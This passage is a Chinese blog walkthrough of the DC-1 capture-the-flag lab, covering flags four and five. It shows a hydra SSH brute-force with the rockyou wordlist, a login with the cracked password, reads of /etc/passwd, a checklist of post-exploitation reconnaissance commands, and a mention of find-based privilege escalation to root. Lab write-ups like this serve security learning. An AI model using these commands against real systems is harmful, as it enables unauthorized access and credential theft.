DC系列靶场---DC 1靶场的渗透测试(二)

第四个flag

我们通过账户文件发现flag4是个用户,那我们就使用hydra进行暴力破解

cat /etc/passwd

hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。

cd /usr/share/wordlists
gunzip rockyou.txt.gz

Rochyou.txt是一个压缩文件,那我们先进解压

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://172.30.1.140

我们通过爆破发现这个flag4的密码为orange

ssh flag4@172.30.1.140

我们使用SSH进行远程登录

根据Flag3的提示,可以使用find越权

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

提权

提权之前的信息收集(很重要,增加渗透攻击面)

(1)IP地址

/sbin/ifconfig

(2)当前用户

whoami

(3)内核版本

uname -r

(4)开放的端口

netstat -tunlp

(5)进程

ps aux

(6)账户信息

cat /etc/passwd

(7)主机名

hostname

(8)任务计划

crontab -l

(9)敏感文件

grep “passwd” -R /

(10)发行版本

lsb_release -a

find命令越权

ssh flag4@172.30.1.140

这样我们通过看命令提示符就可以看到这是root用户

第五个flag

cd /root
cat thefinalflag.txt

我们cd切换到root就可以看到第五个flag了

  • 12
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值